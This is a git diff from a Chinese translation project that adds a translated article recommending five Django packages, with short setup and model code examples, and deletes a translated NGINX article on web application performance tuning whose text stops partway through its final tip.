diff --git a/translated/talk/yearbook2015/20160306 5 Favorite Open Source Django Packages.md b/translated/talk/yearbook2015/20160306 5 Favorite Open Source Django Packages.md
new file mode 100644
index 0000000000..81e999fd80
--- /dev/null
+++ b/translated/talk/yearbook2015/20160306 5 Favorite Open Source Django Packages.md
@@ -0,0 +1,164 @@
+5 个最受喜爱的开源 Django 包
+================================================================================
+![Yearbook cover 2015](https://opensource.com/sites/default/files/styles/image-full-size/public/u23316/osdc-open-source-yearbook-lead8.png?itok=0_5-hdFE)
+
+图片来源:Opensource.com
+
+_Jacob Kaplan-Moss 和 Frank Wiles 也参与了本文的写作。_
+
+Django 是围绕“[可重用应用][1]”的理念建立的:即自包含的、提供可复用特性的包。你可以将这些可重用应用组装起来,再加上适用于你的网站的特定代码,来搭建自己的网站。Django 拥有一个由可重用应用组成的丰富多样的生态系统供你使用 —— PyPI 列出了[超过 8000 个 Django 应用][2]—— 可你该如何知道哪些是最好的呢?
+
+为了节省你的时间,我们总结了五个最受喜爱的 Django 应用。它们是:
+- [Cookiecutter][3]: 建立 Django 网站的最佳方式。
+- [Whitenoise][4]: 最棒的静态资源服务器。
+- [Django Rest Framework][5]: 使用 Django 开发 REST API 的最佳方式。
+- [Wagtail][6]: 基于 Django 的最佳内容管理系统。
+- [django-allauth][7]: 提供社交账户登录的最佳应用(如 Twitter, Facebook, GitHub 等)。
+
+我们同样推荐你查看 [Django Packages][8],这是一个可重用 Django 应用的目录。Django Packages 将 Django 应用组织成“表格”,你可以在功能相似的不同应用之间进行比较并做出选择。你可以查看每个包提供的特性和使用统计情况。(比如:这是 [REST 工具的表格][9],也许可以帮助你理解我们为何推荐 Django REST Framework。)
+
+## 为什么你应该相信我们?
+
+我们使用 Django 的时间几乎比所有人都长。在 Django 发布之前,我们当中的两个人(Frank 和 Jacob)就在 [Lawrence Journal-World][10](Django 的发源地)工作(事实上,是他们两人推动了 Django 的开源发布)。在过去的八年中,我们经营着一家咨询公司,帮助各类公司用好 Django。
+
+所以,我们见证了 Django 项目和社区的完整历史,见证了流行软件包的兴起和没落。我们三人加起来,可能私下试用过这 8000 个应用中的一半以上,或者认识试用过它们的人。我们对如何让应用变得坚实可靠有着深刻的理解,也很清楚是什么给予了这些应用持久的生命力。
+
+## 建立Django网站的最佳方式:[Cookiecutter][3]
+
+建立一个新项目或应用总是有些痛苦。你可以用 Django 内建的 `startproject`,不过,如果你像我们一样,你可能会对做事的方式很挑剔。Cookiecutter 为你提供了一个快捷、简单的方式来构建易于使用的项目或应用模板,从而解决了这个问题。一个简单的例子:键入 `pip install cookiecutter`,然后在命令行中运行以下命令:
+
+```bash
+$ cookiecutter https://github.com/marcofucci/cookiecutter-simple-django
+```
+
+接下来你需要回答几个简单的问题,比如你的项目名称、目录、作者名字、E-Mail 和其他几个关于配置的小问题。这些能够帮你补充项目相关的细节。我们使用最简单的“_foo_”作为目录名称。于是 cookiecutter 就在子目录“_foo_”下建立了一个简单的 Django 项目。
+
+如果你在“_foo_”项目中四处看看,你会发现你刚刚输入的其它设置已经通过模板,连同所需的子目录一起嵌入到各个文件当中。这个“模板”由我们刚刚执行 `cookiecutter` 命令时输入的 GitHub 仓库 URL 所指定。这个样例工程使用了一个 GitHub 远程仓库作为模板;不过你也可以使用本地的模板,这在建立不可重用的项目时非常有用。
+
+我们认为 cookiecutter 是一个极棒的 Django 包,但事实上它在面对纯 Python 甚至非 Python 的需求时也极为有用。你能够将所有文件依你所愿精确摆放在任何位置上,这使得 cookiecutter 成为了一个简化工作流程的极佳工具。
+
+## 最棒的静态资源服务器:[Whitenoise][4]
+
+多年来,托管网站的静态资源 —— 图片、JavaScript、CSS —— 都是一件很痛苦的事情。Django 内建的 [django.views.static.serve][11] 视图,就像 Django 文档所述的那样,“在生产环境中不可靠,只应作为开发时的辅助功能。”但使用一个“真正的”Web 服务器(如 NGINX)或者借助 CDN 来托管媒体资源,配置起来会相当困难。
+
+Whitenoise 很简洁地解决了这个问题。它可以像在开发环境那样轻易地在生产环境中架设静态服务器,并且针对生产环境进行了加固和优化。它的设置方法极为简单:
+
+1. 确保你在使用 Django 的 [contrib.staticfiles][12] 应用,并确认你在配置文件中正确设置了 `STATIC_ROOT` 变量。
+
+2. 在 `wsgi.py` 文件中启用 Whitenoise:
+
+ ```python
+ from django.core.wsgi import get_wsgi_application
+ from whitenoise.django import DjangoWhiteNoise
+
+ application = get_wsgi_application()
+ application = DjangoWhiteNoise(application)
+ ```
+
+配置它真的就这么简单!对于大型应用,你可能想要使用一个专用的媒体服务器和/或一个 CDN,但对于大多数小型或中型 Django 网站,Whitenoise 已经足够强大。
+
+如需查看更多关于 Whitenoise 的信息,[请查看文档][13]。
+
+## 开发REST API的最佳工具:[Django REST Framework][5]
+
+REST API 正在迅速成为现代 Web 应用的标准功能。与 API 的交互使用的只是 JSON 而不是 HTML,而这些只用 Django 也能做到:你可以编写自己的视图,设置合适的 `Content-Type`,然后返回 JSON 而不是渲染后的 HTML 响应。在像 [Django Rest Framework][14](下称 DRF)这样的 API 框架发布之前,大多数人就是这么做的。
+
+如果你对 Django 的视图类很熟悉,你会觉得使用 DRF 构建 REST API 的方式与之非常相似,不过 DRF 是专门针对 API 的使用场景设计的,能帮你省掉一般 API 实现中的大量样板代码。这里我们不贴一大段让你兴奋的示例代码,而是强调一些能让你更快上手 DRF 的特性:
+
+* 可自动浏览的 API,可以使你的开发和人工测试轻而易举。你可以查看 DRF 的[在线示例][15]:可以直接查看 API 的响应,并且不需要你做任何事就能支持 POST/PUT/DELETE 类型的操作。
+* 易于集成多种认证方式,如 OAuth、Basic Auth 或 API Token。
+* 内建请求速率限制。
+* 与 [django-rest-swagger][16] 结合使用时,API 文档几乎可以自动生成。
+* 拥有广泛的第三方库生态。
+
+当然,你也可以不依赖 DRF 来构建 API,但我们想不出不用 DRF 的理由。就算你不使用 DRF 的全部特性,使用一个成熟的视图库来构建你自己的 API 也会使你的 API 更加一致、完整,还能提高你的开发速度。如果你还没有开始使用 DRF,你应该找点时间去体验一下。
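+
+下面是一个最小化的 DRF 用法示意(这里借用 Django 自带的 User 模型,字段选择仅作演示):
+
+```python
+from django.contrib.auth.models import User
+from rest_framework import routers, serializers, viewsets
+
+# 序列化器声明 API 要暴露哪些字段
+class UserSerializer(serializers.ModelSerializer):
+    class Meta:
+        model = User
+        fields = ('id', 'username', 'email')
+
+# ViewSet 自动提供 list/retrieve/create/update/delete 操作
+class UserViewSet(viewsets.ModelViewSet):
+    queryset = User.objects.all()
+    serializer_class = UserSerializer
+
+# 路由器自动生成对应的 URL 配置
+router = routers.DefaultRouter()
+router.register(r'users', UserViewSet)
+# 之后在 urls.py 中 include(router.urls) 即可
+```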
+
+## 以 Django 为基础的最佳 CMS:[Wagtail][6]
+
+Wagtail 是当下 Django CMS(内容管理系统)世界中最受青睐的应用,它的流行是有充分理由的。就像大多数 CMS 一样,它具有极佳的灵活性,可以通过简单的 Django 模型来定义不同类型的页面及其内容。使用它,你可以从零开始,在几个小时而不是几天之内搭建出一个基本可以运行的内容管理系统。举一个小例子,为你公司的员工定义一个页面类型可以像下面一样简单:
+
+```python
+from django.db import models
+
+from wagtail.wagtailcore.models import Page
+from wagtail.wagtailcore.fields import RichTextField
+from wagtail.wagtailadmin.edit_handlers import FieldPanel
+from wagtail.wagtailimages.edit_handlers import ImageChooserPanel
+
+class StaffPage(Page):
+    name = models.CharField(max_length=100)
+    hire_date = models.DateField()
+    bio = RichTextField()    # 注意:RichTextField 来自 wagtail,而非 django.db.models
+    email = models.EmailField()
+    headshot = models.ForeignKey('wagtailimages.Image', null=True, blank=True)
+
+    content_panels = Page.content_panels + [
+        FieldPanel('name'),
+        FieldPanel('hire_date'),
+        FieldPanel('email'),
+        FieldPanel('bio', classname="full"),
+        ImageChooserPanel('headshot'),
+    ]
+```
+
+然而,Wagtail 真正出彩的地方在于它的灵活性及其易于使用的现代化管理界面。你可以控制不同类型的页面可以出现在网站的哪些区域,为页面添加复杂的附加逻辑,还可以极为方便地获得标准的审核/批准工作流。在大多数 CMS 系统中,开发到某个阶段你总会碰壁;而到目前为止,Wagtail 还没有让我们碰过壁,我们可以轻易地开发出一套简洁稳定的系统,让程序完全按照我们的想法运行。如果你对此感兴趣,我们写过一篇[深入理解 Wagtail][17] 的文章。
+
+## 提供社交账户登录的最佳工具:[django-allauth][7]
+
+django-allauth 是一个能够解决你的注册和认证需求的、可重用的 Django 应用。无论你需要构建本地账户注册系统还是社交账户注册系统,django-allauth 都能够帮你做到。
+
+这个应用支持多种认证体系,比如用户名或电子邮件登录。用户注册成功后,它还提供从无需验证到必须通过电子邮件验证的多种账户验证策略。同时,它也支持将多个社交账户和电子邮件账户关联到同一账户上。它还支持可插拔的注册表单,可让用户在注册时回答一些附加问题。
+
+django-allauth 支持 20 多种认证提供者,包括 Facebook、GitHub、Google 和 Twitter。如果你发现了一个它不支持的社交网站,那很有可能会有第三方插件提供该网站的接入支持。它还支持编写自定义的后端,以接入自定义的认证方式。
+
+django-allauth 易于配置,且有[完善的文档][18]。该项目通过了很多测试,所以你可以相信它的所有部件都会正常运作。
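+
+下面是一个启用 django-allauth 的最小化配置示意(settings.py 片段,启用哪些社交提供者按需选择):
+
+```python
+INSTALLED_APPS = [
+    # ...Django 自带的应用...
+    'django.contrib.sites',       # allauth 依赖 sites 框架
+    'allauth',
+    'allauth.account',
+    'allauth.socialaccount',
+    'allauth.socialaccount.providers.github',  # 示例:启用 GitHub 登录
+]
+
+SITE_ID = 1
+
+AUTHENTICATION_BACKENDS = (
+    'django.contrib.auth.backends.ModelBackend',            # 保留 Django 默认登录
+    'allauth.account.auth_backends.AuthenticationBackend',  # allauth 提供的登录方式
+)
+```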
+
+你有最喜爱的 Django 包吗?请在评论中告诉我们。
+
+## 关于作者
+
+![Photo](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/main-one-i-use-everywhere.png?itok=66GC-D1q)
+
+Jeff Triplett
+
+劳伦斯,堪萨斯州
+
+
+我在 2007 年搬到了堪萨斯州的劳伦斯,在 Django 的发源地 Lawrence Journal-World 工作。我现在在劳伦斯市的 [Revolution Systems (Revsys)][19] 担任开发者兼顾问。
+
+我是[北美 Django 活动基金会(DEFNA)][20]的联合创始人,2015 和 2016 年 [DjangoCon US][21] 的会议主席,而且我在 Django 的发源地劳伦斯参与组织了 [Django Birthday][22] 活动来庆祝 Django 的 10 岁生日。
+
+我是当地越野跑小组的成员,我喜欢篮球,我还喜欢梦见自己随着一道气流游遍美国。
+
+--------------------------------------------------------------------------------
+
+via: https://opensource.com/business/15/12/5-favorite-open-source-django-packages
+
+作者:[Jeff Triplett][a]
+译者:[StdioA](https://github.com/StdioA)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://opensource.com/users/jefftriplett
+[1]:https://docs.djangoproject.com/en/1.8/intro/reusable-apps/
+[2]:https://pypi.python.org/pypi?:action=browse&c=523
+[3]:https://github.com/audreyr/cookiecutter
+[4]:http://whitenoise.evans.io/en/latest/base.html
+[5]:http://www.django-rest-framework.org/
+[6]:https://wagtail.io/
+[7]:http://www.intenct.nl/projects/django-allauth/
+[8]:https://www.djangopackages.com/
+[9]:https://www.djangopackages.com/grids/g/rest/
+[10]:http://www2.ljworld.com/news/2015/jul/09/happy-birthday-django/
+[11]:https://docs.djangoproject.com/en/1.8/ref/views/#django.views.static.serve
+[12]:https://docs.djangoproject.com/en/1.8/ref/contrib/staticfiles/
+[13]:http://whitenoise.evans.io/en/latest/index.html
+[14]:http://www.django-rest-framework.org/
+[15]:http://restframework.herokuapp.com/
+[16]:http://django-rest-swagger.readthedocs.org/en/latest/index.html
+[17]:https://opensource.com/business/15/5/wagtail-cms
+[18]:http://django-allauth.readthedocs.org/en/latest/
+[19]:http://www.revsys.com/
+[20]:http://defna.org/
+[21]:https://2015.djangocon.us/
+[22]:https://djangobirthday.com/
diff --git a/translated/tech/20151028 10 Tips for 10x Application Performance.md b/translated/tech/20151028 10 Tips for 10x Application Performance.md
deleted file mode 100644
index 55cd24bd9a..0000000000
--- a/translated/tech/20151028 10 Tips for 10x Application Performance.md
+++ /dev/null
@@ -1,279 +0,0 @@
-10 Tips for 10x Application Performance
-
-将程序性能提高十倍的10条建议
-================================================================================
-
-提高web 应用的性能从来没有比现在更关键过。网络经济的比重一直在增长;全球经济超过5% 的价值是在因特网上产生的(数据参见下面的资料)。我们的永远在线、超级连接的世界意味着用户的期望值也处于历史上的最高点。如果你的网站不能及时的响应,或者你的app 不能无延时的工作,用户会很快的投奔到你的竞争对手那里。
-
-举一个例子,一份亚马逊十年前做过的研究可以证明,甚至在那个时候,网页加载时间每减少100毫秒,收入就会增加1%。另一个最近的研究特别强调一个事实,即超过一半的网站拥有着在调查中说他们会因为应用程序性能的问题流失用户。
-
-网站到底需要多块呢?对于页面加载,每增加1秒钟就有4%的用户放弃使用。顶级的电子商务站点的页面在第一次交互时可以做到1秒到3秒加载时间,而这是提供最高舒适度的速度。很明显这种利害关系对于web 应用来说很高,而且在不断的增加。
-
-想要提高效率很简单,但是看到实际结果很难。要在旅途上帮助你,这篇blog 会给你提供10条最高可以10倍的提升网站性能的建议。这是系列介绍提高应用程序性能的第一篇文章,包括测试充分的优化技术和一点NGIX 的帮助。这个系列给出了潜在的提高安全性的帮助。
-
-### Tip #1: 通过反向代理来提高性能和增加安全性 ###
-
-如果你的web 应用运行在单个机器上,那么这个办法会明显的提升性能:只需要添加一个更快的机器,更好的处理器,更多的内存,更快的磁盘阵列,等等。然后新机器就可以更快的运行你的WordPress 服务器, Node.js 程序, Java 程序,以及其它程序。(如果你的程序要访问数据库服务器,那么这个办法还是很简单:添加两个更快的机器,以及在两台电脑之间使用一个更快的链路。)
-
-问题是,机器速度可能并不是问题。web 程序运行慢经常是因为计算机一直在不同的任务之间切换:和用户的成千上万的连接,从磁盘访问文件,运行代码,等等。应用服务器可能会抖动-内存不足,将内存数据写会磁盘,以及多个请求等待一个任务完成,如磁盘I/O。
-
-你可以采取一个完全不同的方案来替代升级硬件:添加一个反向代理服务器来分担部分任务。[反向代理服务器][1] 位于运行应用的机器的前端,是用来处理网络流量的。只有反向代理服务器是直接连接到互联网的;和程序的通讯都是通过一个快速的内部网络完成的。
-
-使用反向代理服务器可以将应用服务器从等待用户与web 程序交互解放出来,这样应用服务器就可以专注于为反向代理服务器构建网页,让其能够传输到互联网上。而应用服务器就不需要在能带客户端的响应,可以运行与接近优化过的性能水平。
-
-添加方向代理服务器还可以给你的web 服务器安装带来灵活性。比如,一个已知类型的服务器已经超载了,那么就可以轻松的添加另一个相同的服务器;如果某个机器宕机了,也可以很容易的被替代。
-
-因为反向代理带来的灵活性,所以方向代理也是一些性能加速功能的必要前提,比如:
-
-- **负载均衡** (参见 [Tip #2][2]) – 负载均衡运行在方向代理服务器上,用来将流量均衡分配给一批应用。有了合适的负载均衡,你就可以在不改变程序的前提下添加应用服务器。
-- **缓存静态文件** (参见 [Tip #3][3]) – 直接读取的文件,比如图像或者代码,可以保存在方向代理服务器,然后直接发给客户端,这样就可以提高速度、分担应用服务器的负载,可以让应用运行的更快
-- **网站安全** – 反响代理服务器可以提高网站安全性,以及快速的发现和响应攻击,保证应用服务器处于被保护状态。
-
-NGINX 软件是一个专门设计的反响代理服务器,也包含了上述的多种功能。NGINX 使用事件驱动的方式处理问题,着回避传统的服务器更加有效率。NGINX plus 天价了更多高级的反向代理特性,比如程序[健康度检查][4],专门用来处理request 路由,高级缓冲和相关支持。
-
-![NGINX Worker Process helps increase application performance](https://www.nginx.com/wp-content/uploads/2015/10/Graph-11.png)
-
-### Tip #2: 添加负载平衡 ###
-
-添加一个[负载均衡服务器][5] 是一个相当简单的用来提高性能和网站安全性的的方法。使用负载均衡讲流量分配到多个服务器,是用来替代只使用一个巨大且高性能web 服务器的方案。即使程序写的不好,或者在扩容方面有困难,只使用负载均衡服务器就可以很好的提高用户体验。
-
-负载均衡服务器首先是一个反响代理服务器(参见[Tip #1][6])——它接收来自互联网的流量,然后转发请求给另一个服务器。小戏法是负载均衡服务器支持两个或多个应用服务器,使用[分配算法][7]将请求转发给不同服务器。最简单的负载均衡方法是轮转法,只需要将新的请求发给列表里的下一个服务器。其它的方法包括将请求发给负载最小的活动连接。NGINX plus 拥有将特定用户的会话分配给同一个服务器的[能力][8].
-
-负载均衡可以很好的提高性能是因为它可以避免某个服务器过载而另一些服务器却没有流量来处理。它也可以简单的扩展服务器规模,因为你可以添加多个价格相对便宜的服务器并且保证它们被充分利用了。
-
-可以进行负载均衡的协议包括HTTP, HTTPS, SPDY, HTTP/2, WebSocket,[FastCGI][9],SCGI,uwsgi, memcached,以及集中其它的应用类型,包括采用TCP 第4层协议的程序。分析你的web 应用来决定那些你要使用以及那些地方的性能不足。
-
-相同的服务器或服务器群可以被用来进行负载均衡,也可以用来处理其它的任务,如SSL 终止,提供对客户端使用的HTTP/1/x 和 HTTP/2 ,以及缓存静态文件。
-
-NGINX 经常被用来进行负载均衡;要想了解更多的情况可以访问我们的[overview blog post][10], [configuration blog post][11], [ebook][12] 以及相关网站 [webinar][13], 和 [documentation][14]。我们的商业版本 [NGINX Plus][15] 支持更多优化了的负载均衡特性,如基于服务器响应时间的加载路由和Microsoft’s NTLM 协议上的负载均衡。
-
-### Tip #3: 缓存静态和动态的内容 ###
-
-缓存通过加速内容的传输速度来提高web 应用的性能。它可以采用一下集中策略:当需要的时候预处理要传输的内容,保存数据到速度更快的设备,把数据存储在距离客户端更近的位置,或者结合起来使用。
-
-下面要考虑两种不同类型数据的缓冲:
-
-- **静态内容缓存**。不经常变化的文件,比如图像(JPEG,PNG) 和代码(CSS,JavaScript),可以保存在边缘服务器,这样就可以快速的从内存和磁盘上提取。
-- **动态内容缓存**。很多web 应用回针对每个网页请求生成不同的HTML 页面。在短时间内简单的缓存每个生成HTML 内容,就可以很好的减少要生成的内容的数量,这完全可以达到你的要求。
-
-举个例子,如果一个页面每秒会被浏览10次,你将它缓存1 秒,99%请求的页面都会直接从缓存提取。如果你将将数据分成静态内容,甚至新生成的页面可能都是由这些缓存构成的。
-
-下面由是web 应用发明的三种主要的缓存技术:
-
-- **缩短数据与用户的距离**。把一份内容的拷贝放的离用户更近点来减少传输时间。
-- **提高内容服务器的速度**。内容可以保存在一个更快的服务器上来减少提取文件的时间。
-- **从过载服务器拿走数据**。机器经常因为要完成某些其它的任务而造成某个任务的执行速度比测试结果要差。将数据缓存在不同的机器上可以提高缓存资源和非缓存资源的效率,而这知识因为主机没有被过度使用。
-
-对web 应用的缓存机制可以web 应用服务器内部实现。第一,缓存动态内容是用来减少应用服务器加载动态内容的时间。然后,缓存静态内容(包括动态内容的临时拷贝)是为了更进一步的分担应用服务器的负载。而且缓存之后会从应用服务器转移到对用户而言更快、更近的机器,从而减少应用服务器的压力,减少提取数据和传输数据的时间。
-
-改进过的缓存方案可以极大的提高应用的速度。对于大多数网页来说,静态数据,比如大图像文件,构成了超过一半的内容。如果没有缓存,那么这可能会花费几秒的时间来提取和传输这类数据,但是采用了缓存之后不到1秒就可以完成。
-
-举一个在实际中缓存是如何使用的例子, NGINX 和NGINX Plus使用了两条指令来[设置缓存机制][16]:proxy_cache_path 和 proxy_cache。你可以指定缓存的位置和大小,文件在缓存中保存的最长时间和其他一些参数。使用第三条(而且是相当受欢迎的一条)指令,proxy_cache_use_stale,如果服务器提供新鲜内容是忙或者挂掉之类的信息,你甚至可以让缓存提供旧的内容,这样客户端就不会一无所得。从用户的角度来看这可以很好的提高你的网站或者应用的上线时间。
-
-NGINX plus 拥有[高级缓存特性][17],包括对[缓存清除][18]的支持和在[仪表盘][19]上显示缓存状态信息。
-
-要想获得更多关于NGINX 的缓存机制的信息可以浏览NGINX Plus 管理员指南中的 [reference documentation][20] 和 [NGINX Content Caching][21] 。
-
-**注意**:缓存机制分布于应用开发者、投资决策者以及实际的系统运维人员之间。本文提到的一些复杂的缓存机制从[DevOps 的角度][23]来看很具有价值,即对集应用开发者、架构师以及运维操作人员的功能为一体的工程师来说可以满足他们对站点功能性、响应时间、安全性和商业结果,如完成的交易数。
-
-### Tip #4: 压缩数据 ###
-
-压缩是一个具有很大潜力的提高性能的加速方法。现在已经有一些针对照片(JPEG 和PNG)、视频(MPEG-4)和音乐(MP3)等各类文件精心设计和高压缩率的标准。每一个标准都或多或少的减少了文件的大小。
-
-文本数据 —— 包括HTML(包含了纯文本和HTL 标签),CSS和代码,比如Javascript —— 经常是未经压缩就传输的。压缩这类数据会在对应用程序性能的感觉上,特别是处于慢速或受限的移动网络的客户端,产生不成比例的影响。
-
-这是因为文本数据经常是用户与网页交互的有效数据,而多媒体数据可能更多的是起提供支持或者装饰的作用。聪明的内容压缩可以减少HTML,Javascript,CSS和其他文本内容对贷款的要求,通常可以减少30% 甚至更多的带宽和相应的页面加载时间。
-
-如果你是用SSL,压缩可以减少需要进行SSL 编码的的数据量,而这些编码操作会占用一些CPU时间而抵消了压缩数据减少的时间。
-
-压缩文本数据的方法很多,举个例子,在定义小说文本压缩模式的[HTTP/2 部分]就专门为适应头数据。另一个例子是可以在NGINX 里打开使用GZIP 压缩文本。你在你的服务里[预压缩文本数据][25]之后,你就可以直接使用gzip_static 指令来处理压缩过的.gz 版本。
-
-### Tip #5: 优化 SSL/TLS ###
-
-安全套接字([SSL][26]) 协议和它的继承者,传输层安全(TLS)协议正在被越来越多的网站采用。SSL/TLS 对从原始服务器发往用户的数据进行加密提高了网站的安全性。影响这个趋势的部分原因是Google 正在使用SSL/TLS,这在搜索引擎排名上是一个正面的影响因素。
-
-尽管SSL/TLS 越来越流行,但是使用加密对速度的影响也让很多网站望而却步。SSL/TLS 之所以让网站变的更慢,原因有二:
-
-1. 任何一个连接第一次连接时的握手过程都需要传递密钥。而采用HTTP/1.x 协议的浏览器在建立多个连接时会对每个连接重复上述操作。
-2. 数据在传输过程中需要不断的在服务器加密、在客户端解密。
-
-要鼓励使用SSL/TLS,HTTP/2 和SPDY(在[下一章][27]会描述)的作者设计新的协议来让浏览器只需要对一个浏览器会话使用一个连接。这会大大的减少上述两个原因中的一个浪费的时间。然而现在可以用来提高应用程序使用SSL/TLS 传输数据的性能的方法不止这些。
-
-web 服务器有对应的机制优化SSL/TLS 传输。举个例子,NGINX 使用[OpenSSL][28]运行在普通的硬件上提供接近专用硬件的传输性能。NGINX [SSL 性能][29] 有详细的文档,而且把对SSL/TLS 数据进行加解密的时间和CPU 占用率降低了很多。
-
-更进一步,在这篇[blog][30]有详细的说明如何提高SSL/TLS 性能,可以总结为一下几点:
-
-- **会话缓冲**。使用指令[ssl_session_cache][31]可以缓存每个新的SSL/TLS 连接使用的参数。
-- **会话票据或者ID**。把SSL/TLS 的信息保存在一个票据或者ID 里可以流畅的复用而不需要重新握手。
-- **OCSP 分割**。通过缓存SSL/TLS 证书信息来减少握手时间。
-
-NGINX 和NGINX Plus 可以被用作SSL/TLS 终结——处理客户端流量的加密和解密,而同时和其他服务器进行明文通信。使用[这几步][32] 来设置NGINX 和NGINX Plus 处理SSL/TLS 终止。同时,这里还有一些NGINX Plus 和接收TCP 连接的服务器一起使用时的[特有的步骤][33]
-
-### Tip #6: 使用 HTTP/2 或 SPDY ###
-
-对于已经使用了SSL/TLS 的站点,HTTP/2 和SPDY 可以很好的提高性能,因为每个连接只需要一次握手。而对于没有使用SSL/TLS 的站点来说,HTTP/2 和SPDY会在响应速度上有些影响(通常会将度效率)。
-
-Google 在2012年开始把SPDY 作为一个比HTTP/1.x 更快速的协议来推荐。HTTP/2 是目前IETF 标准,他也基于SPDY。SPDY 已经被广泛的支持了,但是很快就会被HTTP/2 替代。
-
-SPDY 和HTTP/2 的关键是用单连接来替代多路连接。单个连接是被复用的,所以它可以同时携带多个请求和响应的分片。
-
-通过使用一个连接这些协议可以避免过多的设置和管理多个连接,就像浏览器实现了HTTP/1.x 一样。单连接在对SSL 特别有效,这是因为它可以最小化SSL/TLS 建立安全链接时的握手时间。
-
-SPDY 协议需要使用SSL/TLS, 而HTTP/2 官方并不需要,但是目前所有支持HTTP/2的浏览器只有在使能了SSL/TLS 的情况下才会使用它。这就意味着支持HTTP/2 的浏览器只有在网站使用了SSL 并且服务器接收HTTP/2 流量的情况下才会启用HTTP/2。否则的话浏览器就会使用HTTP/1.x 协议。
-
-当你实现SPDY 或者HTTP/2时,你不再需要通常的HTTP 性能优化方案,比如域分隔资源聚合,以及图像登记。这些改变可以让你的代码和部署变得更简单和更易于管理。要了解HTTP/2 带来的这些变化可以浏览我们的[白皮书][34]。
-
-![NGINX Supports SPDY and HTTP/2 for increased web application performance](https://www.nginx.com/wp-content/uploads/2015/10/http2-27.png)
-
-作为支持这些协议的一个样例,NGINX 已经从一开始就支持了SPDY,而且[大部分使用SPDY 协议的网站][35]都运行的是NGINX。NGINX 同时也[很早][36]对HTTP/2 的提供了支持,从2015 年9月开始开源NGINX 和NGINX Plus 就[支持][37]它了。
-
-经过一段时间,我们NGINX 希望更多的站点完全是能SSL 并且向HTTP/2 迁移。这将会提高安全性,同时新的优化手段也会被发现和实现,更简单的代码表现的更加优异。
-
-### Tip #7: 升级软件版本 ###
-
-一个提高应用性能的简单办法是根据软件的稳定性和性能的评价来选在你的软件栈。进一步说,因为高性能组件的开发者更愿意追求更高的性能和解决bug ,所以值得使用最新版本的软件。新版本往往更受开发者和用户社区的关注。更新的版本往往会利用到新的编译器优化,包括对新硬件的调优。
-
-稳定的新版本通常比旧版本具有更好的兼容性和更高的性能。一直进行软件更新,可以非常简单的保持软件保持最佳的优化,解决掉bug,以及安全性的提高。
-
-一直使用旧版软件也会组织你利用新的特性。比如上面说到的HTTP/2,目前要求OpenSSL 1.0.1.在2016 年中期开始将会要求1.0.2 ,而这是在2015年1月才发布的。
-
-NGINX 用户可以开始迁移到[NGINX 最新的开源软件][38] 或者[NGINX Plus][39];他们都包含了罪行的能力,如socket分区和线程池(见下文),这些都已经为性能优化过了。然后好好看看的你软件栈,把他们升级到你能能升级道德最新版本吧。
-
-### Tip #8: linux 系统性能调优 ###
-
-linux 是大多数web 服务器使用操作系统,而且作为你的架构的基础,Linux 表现出明显可以提高性能的机会。默认情况下,很多linux 系统都被设置为使用很少的资源,匹配典型的桌面应用负载。这就意味着web 应用需要最少一些等级的调优才能达到最大效能。
-
-Linux 优化是转变们针对web 服务器方面的。以NGINX 为例,这里有一些在加速linux 时需要强调的变化:
-
-- **缓冲队列**。如果你有挂起的连接,那么你应该考虑增加net.core.somaxconn 的值,它代表了可以缓存的连接的最大数量。如果连接线直太小,那么你将会看到错误信息,而你可以逐渐的增加这个参数知道错误信息停止出现。
-- **文件描述符**。NGINX 对一个连接使用最多2个文件描述符。如果你的系统有很多连接,你可能就需要提高sys.fs.file_max ,增加系统对文件描述符数量整体的限制,这样子才能支持不断增加的负载需求。
-- **临时端口**。当使用代理时,NGINX 会为每个上游服务器创建临时端口。你可以设置net.ipv4.ip_local_port_range 来提高这些端口的范围,增加可用的端口。你也可以减少非活动的端口的超时判断来重复使用端口,这可以通过net.ipv4.tcp_fin_timeout 来设置,这可以快速的提高流量。
-
-对于NGINX 来说,可以查阅[NGINX 性能调优指南][40]来学习如果优化你的Linux 系统,这样子它就可以很好的适应大规模网络流量而不会超过工作极限。
-
-### Tip #9: web 服务器性能调优 ###
-
-无论你是用哪种web 服务器,你都需要对它进行优化来提高性能。下面的推荐手段可以用于任何web 服务器,但是一些设置是针对NGINX的。关键的优化手段包括:
-
-- **f访问日志**。不要把每个请求的日志都直接写回磁盘,你可以在内存将日志缓存起来然后一批写回磁盘。对于NGINX 来说添加给指令*access_log* 添加参数 *buffer=size* 可以让系统在缓存满了的情况下才把日志写到此哦按。如果你添加了参数**flush=time** ,那么缓存内容会每隔一段时间再写回磁盘。
-- **缓存**。缓存掌握了内存中的部分资源知道满了位置,这可以让与客户端的通信更加高效。与内存中缓存不匹配的响应会写回磁盘,而这就会降低效能。当NGINX [启用][42]了缓存机制后,你可以使用指令*proxy_buffer_size* 和 *proxy_buffers* 来管理缓存。
-- **客户端保活**。保活连接可以减少开销,特别是使用SSL/TLS时。对于NGINX 来说,你可以增加*keepalive_requests* 的值,从默认值100 开始修改,这样一个客户端就可以转交一个指定的连接,而且你也可以通过增加*keepalive_timeout* 的值来允许保活连接存活更长时间,结果就是让后来的请求处理的更快速。
-- **上游保活**。上游的连接——即连接到应用服务器、数据库服务器等机器的连接——同样也会收益于连接保活。对于上游连接老说,你可以增加*保活时间*,即每个工人进程的空闲保活连接个数。这就可以提高连接的复用次数,减少需要重新打开全新的连接次数。更多关于保活连接的信息可以参见[blog][41].
-- **限制**。限制客户端使用的资源可以提高性能和安全性。对于NGINX 来说指令*limit_conn* 和 *limit_conn_zone* 限制了每个源的连接数量,而*limit_rate* 限制了带宽。这些限制都可以阻止合法用户*攫取* 资源,同时夜避免了攻击。指令*limit_req* 和 *limit_req_zone* 限制了客户端请求。对于上游服务器来说,可以在上游服务器的配置块里使用max_conns 可以限制连接到上游服务器的连接。 这样可以避免服务器过载。关联的队列指令会创建一个队列来在连接数抵达*max_conn* 限制时在指定的长度的时间内保存特定数量的请求。
-- **工人进程**。工人进程负责处理请求。NGINX 采用事件驱动模型和依赖操作系统的机制来有效的讲请求分发给不同的工人进程。这条建议推荐设置每个CPU 的参数*worker_processes* 。如果需要的话,工人连接的最大数(默认512)可以安全在大部分系统增加,是指找到最适合你的系统的值。
